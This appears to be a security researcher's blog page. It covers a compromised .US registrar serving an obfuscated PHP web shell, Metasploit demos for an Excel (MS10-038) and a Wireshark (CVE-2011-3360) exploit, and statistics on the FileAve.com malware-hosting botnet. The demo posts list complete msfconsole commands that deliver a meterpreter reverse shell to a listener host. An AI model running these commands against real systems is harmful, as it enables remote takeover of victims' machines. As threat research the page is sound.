About.US Domain Names Registrar Owned

During some analysis on the WordPress TimThumb Botnet, I have discover that an .US domain registrar know as “About.US” is completely compromised… and this since minimum the 15 September. Some RFI (Remote File Inclusion) scripts, how are exploiting the WordPress TimThumb vulnerability, are calling, in a obfuscate mode, a hidden file “stun.jpg” on “About.US” Web site.

This file “stun.jpg” file is also obfuscated and identified as a PHP Shell Malware by 3/20 anti viruses on Jotti, 3/36 anti viruses on VirusScan and 3/43 anti viruses on VirusTotal. The obfuscation is done 10 times with gzinflate(str_rot13(base64_decode())) functions. After deobfuscating the revealed code is a Web PHP Shell named “[ STUNSHELL #unknown @ ByroeNet ]“. You can find this Web PHP Shell with a simple Google dork.

As you know, to exploit WordPress TimThumb vulnerability some extra technical infrastructure is required, such as to be able to create domain names or subdomains containing :

  • flickr.com
  • picasa.com
  • blogger.com
  • wordpress.com
  • img.youtube.com
  • upload.wikimedia.org
  • photobucket.com
Isn’t it easy to create such domains or subdomains if you have own a Domain Name registrar !

MS10-038 Office Excel 2002 Overflow Exploit Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Nicolas Joly
Coordinated release of the vulnerability the 2010-06-08
First exploit provided by abysssec the 2010-09-24
Metasploit PoC provided the 2011-11-21

PoC provided by :

Nicolas Joly
Shahin Ramezany
juan vazquez

Reference(s) :

CVE-2010-0822
OSVDB-65236
MS10-038
MOAUB #24
EBD-ID-15094

Affected version(s) :

Microsoft Office Excel 2002 Service Pack 3 and below
Microsoft Office Excel 2003 Service Pack 3 and below
Microsoft Office Excel 2007 Service Pack 1 and below
Microsoft Office Excel 2007 Service Pack 2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Open XML File Format Converter for Mac
Microsoft Office Excel Viewer Service Pack 1 and below
Microsoft Office Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel
PowerPoint 2007 File Formats Service Pack 1
Microsoft Office Compatibility Pack for Word, Excel
PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Excel 2002 (10.2614.2625) SP0

Description :

This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker can get the control of the execution flow. This results arbitrary code execution under the context of the user.

Commands :

use exploit/windows/fileformat/ms10_038_excel_obj_bof
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo

CVE-2011-3360 Wireshark console.lua pre-loading Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Haifei Li of MMPC the 2011-07-18
Coordinated release of the vulnerability the 2011-11-15
Metasploit PoC provided the 2011-11-18

PoC provided by :

Haifei Li
sinn3r

Reference(s) :

CVE-2011-3360
OSVDB-75347
MSVR11-014

Affected version(s) :

Wireshark 1.6.1 and earlier

Tested on Windows XP Pro SP3 with :

Wireshark 1.6.1

Description :

This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a pcap file, Wireshark will actually check if there’s a ‘console.lua’ file in the same directory, and then parse/execute the script if found. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8

Commands :

use exploit/windows/misc/wireshark_lua
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

In Memory of FileAve.com Botnet

Good news for every one, FileAve.com is finally down since the 18 October ! In July 2010 I have written a blog post on FileAve.com a free file hosting provider notorious for spreading thousands of malwares. FileAve.com have provide 50 MB free storage and a free sub domain for each created account (ex : http://yourname.fileave.com). FileAve.com was owned and operated by “Ripside Interactive, Inc.“, located in US, and more precisely by “Smith, Scott“, since September 2008. “Ripside Interactive, Inc.” was also owner of ripway.com, another notorious malware hoster.

FileAve.com is present in Clean MX database since the 2007-11-30, in Malc0de database since the 2010-01-11 and in our database since the 2009-02-16.

With the data’s contained in our Honeynet database, I can provide you the following statistics. FileAve.com and associated subdomains were linked to 94 other malware spreaders, but FileAve.com was the most important malware spreader in this botnet. These 95 malware spreaders were regularly contacted, by 1420 other source IP addresses, but not known for hosting malwares, in order to attempt to infect new potential vulnerable web servers or computers.

The median lifetime of the 95 malware spreaders were 5 days, with 6 of them how have a lifetime above 1 year, and 2 of the 6 with a lifetime above 2 years. On the 1420 other source IP addresses, 754 of them were directly connected to FileAve.com IP address.

43 of the malware spreaders were located in South Korea and 32 others were located in US. 837 distinct source IP addresses have contact the malware spreaders located in US and 309 others have contact malware spreaders located in South Korea.

The malware spreaders hosting country how has taken the longest time to shut down the malware spreaders is France, with only 2 malware spreaders located in this country but with an average lifetime of 184 days. The second country is China with 2 malware spreaders and with an average lifetime of 164 days. The third country is Thailand with 2 malware spreaders and with an average lifetime of 127 days. The fourth country is South Korea with 43 malware spreaders and with an average lifetime of 105 days.

FileAve.com botnet golden age have occur between March 2010 and September 2010, with the most active malware spreaders ratio, with the most source IP addresses and the most generated events.

If you are interested in more statistics about FileAve.com activities, I have written an PDF available here. Also I have create a geographic time map of all activities generated by the FileAve.com botnet.

Go to Top